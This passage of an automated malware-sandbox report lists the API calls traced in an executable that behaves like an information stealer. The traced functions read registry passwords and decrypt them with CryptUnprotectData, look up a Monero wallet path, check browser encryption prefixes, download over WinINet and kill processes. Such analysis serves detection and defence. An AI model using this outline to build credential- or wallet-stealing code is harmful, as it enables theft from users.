                          • Instruction Fuzzy Hash: 0E416275640209ABEB20DF64DC89FEE7B79FB44701F008555FA05E7190EF74AD848BA8
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051BC1F
                          • lstrlen.KERNEL32(00000000), ref: 0051BC52
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051BC7C
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051BC84
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051BCAC
                          • lstrlen.KERNEL32(00544AD4), ref: 0051BD23
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID:
                          • API String ID: 2500673778-0
                          • Opcode ID: 557ae471f16619810a66ba83219ba1a413c0e99f49742ebd883d8100f89da596
                          • Instruction ID: 68b70c64b390c64a3f601e78e007170e0a36016f6d084fec72e80072d4e4c47f
                          • Opcode Fuzzy Hash: 557ae471f16619810a66ba83219ba1a413c0e99f49742ebd883d8100f89da596
                          • Instruction Fuzzy Hash: 91A14F34A012068FFB25DF68D949AEEBBB5BF85304F188069E405DB261DB36DCC1CB94
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00535F2A
                          • std::_Xinvalid_argument.LIBCPMT ref: 00535F49
                          • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00536014
                          • memmove.MSVCRT(00000000,00000000,?), ref: 0053609F
                          • std::_Xinvalid_argument.LIBCPMT ref: 005360D0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_$memmove
                          • String ID: invalid string position$string too long
                          • API String ID: 1975243496-4289949731
                          • Opcode ID: 4e8778b3e830a316d647cb49491d48ae7e91fea497a9b7f9ea63e7f3b5d02819
                          • Instruction ID: 5700b13d4666bdea0f017f1a1bed75bee4f2d0745cc430b037963eda37f8264c
                          • Opcode Fuzzy Hash: 4e8778b3e830a316d647cb49491d48ae7e91fea497a9b7f9ea63e7f3b5d02819
                          • Instruction Fuzzy Hash: DE615E70700544EBDB18CF5CC8D996EBBB6FB84304F248A5DE5928B782E731AD80CB95
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052E06F
                          • lstrcat.KERNEL32(?,00000000), ref: 0052E07D
                          • lstrcat.KERNEL32(?,?), ref: 0052E098
                          • lstrcat.KERNEL32(?,?), ref: 0052E0AC
                          • lstrcat.KERNEL32(?,0119B248), ref: 0052E0C0
                          • lstrcat.KERNEL32(?,?), ref: 0052E0D4
                          • lstrcat.KERNEL32(?,011AD3E8), ref: 0052E0E7
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052E11F
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0052E126
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$AttributesFile
                          • String ID:
                          • API String ID: 3428472996-0
                          • Opcode ID: 276dde4b8c15494591fc689b33572d4965a158ea0a9d1191b19430beb053de69
                          • Instruction ID: f1aca8f014980d48329c1cde5c074fd812248d26c38bc4af7563536f47de6a7e
                          • Opcode Fuzzy Hash: 276dde4b8c15494591fc689b33572d4965a158ea0a9d1191b19430beb053de69
                          • Instruction Fuzzy Hash: 6841EE7191012D9BDB25EB64EC49ADE7BB4BF89300F0089A5FA0A93250DB749FD5CF90
                          APIs
                            • Part of subcall function 005177D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00517805
                            • Part of subcall function 005177D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0051784A
                            • Part of subcall function 005177D0: StrStrA.SHLWAPI(?,Password), ref: 005178B8
                            • Part of subcall function 005177D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 005178EC
                            • Part of subcall function 005177D0: HeapFree.KERNEL32(00000000), ref: 005178F3
                          • lstrcat.KERNEL32(00000000,00544AD4), ref: 00517A90
                          • lstrcat.KERNEL32(00000000,?), ref: 00517ABD
                          • lstrcat.KERNEL32(00000000, : ), ref: 00517ACF
                          • lstrcat.KERNEL32(00000000,?), ref: 00517AF0
                          • wsprintfA.USER32 ref: 00517B10
                          • lstrcpy.KERNEL32(00000000,?), ref: 00517B39
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00517B47
                          • lstrcat.KERNEL32(00000000,00544AD4), ref: 00517B60
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                          • String ID: :
                          • API String ID: 398153587-3653984579
                          • Opcode ID: e465799f477f44a0c1b56dbeb56a856cc09fac9156413a7a2d95dc0e3eb6a52d
                          • Instruction ID: 0ab4aa37a2eccf594bd465f9c7fcae9efdb328c57c1e61336ef7a7dd6ab7b77a
                          • Opcode Fuzzy Hash: e465799f477f44a0c1b56dbeb56a856cc09fac9156413a7a2d95dc0e3eb6a52d
                          • Instruction Fuzzy Hash: E731D5BAA0421CAFDB10DB68DC449EFBF7AFF89300F14851AE605A3210DB74A981DB55
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 0052820C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00528243
                          • lstrlen.KERNEL32(00000000), ref: 00528260
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00528297
                          • lstrlen.KERNEL32(00000000), ref: 005282B4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005282EB
                          • lstrlen.KERNEL32(00000000), ref: 00528308
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00528337
                          • lstrlen.KERNEL32(00000000), ref: 00528351
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00528380
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: a96a46412f896e6df09524f7a4af571cafffe72cbfa55bfd933c1a3c521f2b49
                          • Instruction ID: 29c86f992cc6f2e8749cb36ce1bc02a7e0356c54eae92067803fa5d842d4013c
                          • Opcode Fuzzy Hash: a96a46412f896e6df09524f7a4af571cafffe72cbfa55bfd933c1a3c521f2b49
                          • Instruction Fuzzy Hash: 815172755016129BE714DFB8EC98ABABBA4FF51700F114914AD16DB284EB34EDA0CBD0
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00517805
                          • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0051784A
                          • StrStrA.SHLWAPI(?,Password), ref: 005178B8
                            • Part of subcall function 00517750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0051775E
                            • Part of subcall function 00517750: RtlAllocateHeap.NTDLL(00000000), ref: 00517765
                            • Part of subcall function 00517750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0051778D
                            • Part of subcall function 00517750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 005177AD
                            • Part of subcall function 00517750: LocalFree.KERNEL32(?), ref: 005177B7
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005178EC
                          • HeapFree.KERNEL32(00000000), ref: 005178F3
                          • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00517A35
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                          • String ID: Password
                          • API String ID: 356768136-3434357891
                          • Opcode ID: 2079e0753c2b9d7a3620fc089bb1665b4c43d32d7bc80c44b4b72c4d45860fda
                          • Instruction ID: a1bf9dda886908a22af27e00b384c1dd4bda5b5341d07ea7c96accf3d04b7313
                          • Opcode Fuzzy Hash: 2079e0753c2b9d7a3620fc089bb1665b4c43d32d7bc80c44b4b72c4d45860fda
                          • Instruction Fuzzy Hash: B07162B5D0021DABDB10DF98CC80AEEBBB9FF49300F10456AE509A7240EB355A89CF94
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00511135
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0051113C
                          • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00511159
                          • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00511173
                          • RegCloseKey.ADVAPI32(?), ref: 0051117D
                          Strings
                          • SOFTWARE\monero-project\monero-core, xrefs: 0051114F
                          • wallet_path, xrefs: 0051116D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                          • API String ID: 3225020163-4244082812
                          • Opcode ID: 87d93f821868ba62b7963f2aa92ab31313115271fd744424bfe2b2db02fcbc2b
                          • Instruction ID: 43f6c4994fe6b7932251fc9394019ce7a0268ed6db1e2311282373517122b70b
                          • Opcode Fuzzy Hash: 87d93f821868ba62b7963f2aa92ab31313115271fd744424bfe2b2db02fcbc2b
                          • Instruction Fuzzy Hash: 35F06D79680209BBE7109BA09C4DFEB7B6CEB05715F004055FF05E2290E7B45A4887A4
                          APIs
                          • memcmp.MSVCRT(?,v20,00000003), ref: 00519E04
                          • memcmp.MSVCRT(?,v10,00000003), ref: 00519E42
                          • LocalAlloc.KERNEL32(00000040), ref: 00519EA7
                            • Part of subcall function 005371E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 005371FE
                          • lstrcpy.KERNEL32(00000000,00544C48), ref: 00519FB2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpymemcmp$AllocLocal
                          • String ID: @$v10$v20
                          • API String ID: 102826412-278772428
                          • Opcode ID: 470a2ba792cb190f82d1f9b0f5453c8ba4347f299541de89c808477db9de4f28
                          • Instruction ID: 38f771d75297f846ac1f5d63ff5f5f65f006c4e3baf68e32ace9735d2ca99468
                          • Opcode Fuzzy Hash: 470a2ba792cb190f82d1f9b0f5453c8ba4347f299541de89c808477db9de4f28
                          • Instruction Fuzzy Hash: 3851A171A5020AABEB11EF68DC89BDE7FB4BF40314F154424F909EB241DB70DD958B90
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0051565A
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00515661
                          • InternetOpenA.WININET(0053CFEC,00000000,00000000,00000000,00000000), ref: 00515677
                          • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00515692
                          • InternetReadFile.WININET(?,?,00000400,00000001), ref: 005156BC
                          • memcpy.MSVCRT(00000000,?,00000001), ref: 005156E1
                          • InternetCloseHandle.WININET(?), ref: 005156FA
                          • InternetCloseHandle.WININET(00000000), ref: 00515701
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                          • String ID:
                          • API String ID: 1008454911-0
                          • Opcode ID: 08b9c445addb7b3b9fe0a3a02bfbe295451e523281cc9aa5f8e6fdee9bd065aa
                          • Instruction ID: 440d2da3ab64397455f9a16675ba36f8a8440ac5e893f93dda5b3ca2c78cd264
                          • Opcode Fuzzy Hash: 08b9c445addb7b3b9fe0a3a02bfbe295451e523281cc9aa5f8e6fdee9bd065aa
                          • Instruction Fuzzy Hash: CC419274A00205DFEB14CF64DC89FAABBB4FF85340F14C06AEA089B291E7759D81CB94
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00534759
                          • Process32First.KERNEL32(00000000,00000128), ref: 00534769
                          • Process32Next.KERNEL32(00000000,00000128), ref: 0053477B
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0053479C
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 005347AB
                          • CloseHandle.KERNEL32(00000000), ref: 005347B2
                          • Process32Next.KERNEL32(00000000,00000128), ref: 005347C0
                          • CloseHandle.KERNEL32(00000000), ref: 005347CB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 3836391474-0
                          • Opcode ID: f335adf0e4f226552ce950e24248a02d2404db0445a86cd411a54ad355032c0f
                          • Instruction ID: 7571a5ee42de9ab0974592365a5d0a33ac0b9cd2d698df432165c6f9ed204d82
                          • Opcode Fuzzy Hash: f335adf0e4f226552ce950e24248a02d2404db0445a86cd411a54ad355032c0f
                          • Instruction Fuzzy Hash: EE01F535601218ABE7305B209C89FEE7BBCFB0AB41F004282FA05D1091EF78AD858E65
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 00528435
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052846C
                          • lstrlen.KERNEL32(00000000), ref: 005284B2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005284E9
                          • lstrlen.KERNEL32(00000000), ref: 005284FF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052852E
                          • StrCmpCA.SHLWAPI(00000000,00544C3C), ref: 0052853E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 233de0a2a16dbc0cd25690327ffb8028ccc28afec760b227bf151a8fecac919c
                          • Instruction ID: 17456d0978199dd85da742bf4dcd9be79f6121e7874595d81ceb02f0a9f9a72c
                          • Opcode Fuzzy Hash: 233de0a2a16dbc0cd25690327ffb8028ccc28afec760b227bf151a8fecac919c
                          • Instruction Fuzzy Hash: BC51B5756002269FDB20DFA8E884AABBBF5FF85700F148459EC45DB285EF34D981CB90
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00532925
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0053292C
                          • RegOpenKeyExA.ADVAPI32(80000002,0119B738,00000000,00020119,005328A9), ref: 0053294B
                          • RegQueryValueExA.ADVAPI32(005328A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00532965
                          • RegCloseKey.ADVAPI32(005328A9), ref: 0053296F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: 900f603dd3441142f80d59f2a0aad44b6ce2cec54495ecf2cdd0d8a0b4f4bfb9
                          • Instruction ID: 414c3102449b75cd71df5016b2e5487ec99f5f395fab5ddc99128ddf240785de
                          • Opcode Fuzzy Hash: 900f603dd3441142f80d59f2a0aad44b6ce2cec54495ecf2cdd0d8a0b4f4bfb9
                          • Instruction Fuzzy Hash: 3E01FC79600319ABD320CBA09C48FEB7BACEB0A711F108089FE8597240EB34590887A0
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00532895
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0053289C
                            • Part of subcall function 00532910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00532925
                            • Part of subcall function 00532910: RtlAllocateHeap.NTDLL(00000000), ref: 0053292C
                            • Part of subcall function 00532910: RegOpenKeyExA.ADVAPI32(80000002,0119B738,00000000,00020119,005328A9), ref: 0053294B
                            • Part of subcall function 00532910: RegQueryValueExA.ADVAPI32(005328A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00532965
                            • Part of subcall function 00532910: RegCloseKey.ADVAPI32(005328A9), ref: 0053296F
                          • RegOpenKeyExA.ADVAPI32(80000002,0119B738,00000000,00020119,00529500), ref: 005328D1
                          • RegQueryValueExA.ADVAPI32(00529500,011ADA80,00000000,00000000,00000000,000000FF), ref: 005328EC
                          • RegCloseKey.ADVAPI32(00529500), ref: 005328F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: 5c4fe3df0326cef23d0ad0d114f118d920834a12c269305111624fdb1d3335c7
                          • Instruction ID: f6d955441e7290185a5e7bda0d7adaa9241de350c1809863c8ab30e203a5701f
                          • Opcode Fuzzy Hash: 5c4fe3df0326cef23d0ad0d114f118d920834a12c269305111624fdb1d3335c7
